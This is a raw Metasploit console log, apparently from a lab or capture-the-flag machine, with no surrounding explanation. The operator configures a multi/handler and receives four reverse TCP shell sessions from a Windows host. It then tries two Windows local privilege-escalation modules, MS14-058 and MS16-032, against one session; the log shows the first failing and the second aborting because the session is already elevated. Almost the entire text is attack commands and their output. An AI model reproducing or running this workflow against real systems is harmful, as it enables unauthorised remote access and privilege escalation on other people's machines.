msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 10.10.14.15
lhost => 10.10.14.15
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Sending stage (336 bytes) to 10.10.10.8
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.8:49178) at 2021-01-17 13:28:55 +0800
[*] Sending stage (336 bytes) to 10.10.10.8
[*] Command shell session 2 opened (10.10.14.15:4444 -> 10.10.10.8:49181) at 2021-01-17 13:28:55 +0800
[*] Sending stage (336 bytes) to 10.10.10.8
[*] Command shell session 3 opened (10.10.14.15:4444 -> 10.10.10.8:49179) at 2021-01-17 13:28:55 +0800
[*] Sending stage (336 bytes) to 10.10.10.8
[*] Command shell session 4 opened (10.10.14.15:4444 -> 10.10.10.8:49180) at 2021-01-17 13:28:55 +0800

More? More? More? More? 
More? 

The filename, directory name, or volume label syntax is incorrect.

C:\Users\kostas\Desktop>backround
backround
'backround' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\kostas\Desktop>background

Background session 4? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x64/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.15:4444 -> 10.10.10.8:49178 (10.10.10.8)
  2         shell x64/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.15:4444 -> 10.10.10.8:49181 (10.10.10.8)
  3         shell x64/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.15:4444 -> 10.10.10.8:49179 (10.10.10.8)
  4         shell x64/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.15:4444 -> 10.10.10.8:49180 (10.10.10.8)

msf5 exploit(multi/handler) > back
msf5 > use exploit/windows/local/ms14_058_track_popup_menu
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.129  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.15
lhost => 10.10.14.15
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lport 4545
lport => 4545
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 10.10.14.15:4545 
[-] Exploit failed: NoMethodError undefined method `reverse!' for nil:NilClass
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > back
msf5 > use exploit/windows/local/ms16_032_secondary_logon_handle_privsec
[-] No results from search
[-] Failed to load module: exploit/windows/local/ms16_032_secondary_logon_handle_privsec
msf5 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set target 1
target => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.129  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.15
lhost => 10.10.14.15
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 4545
lport => 4545
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 10.10.14.15:4545 
[-] Exploit aborted due to failure: none: Session is already elevated
[+] Deleted 
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > 

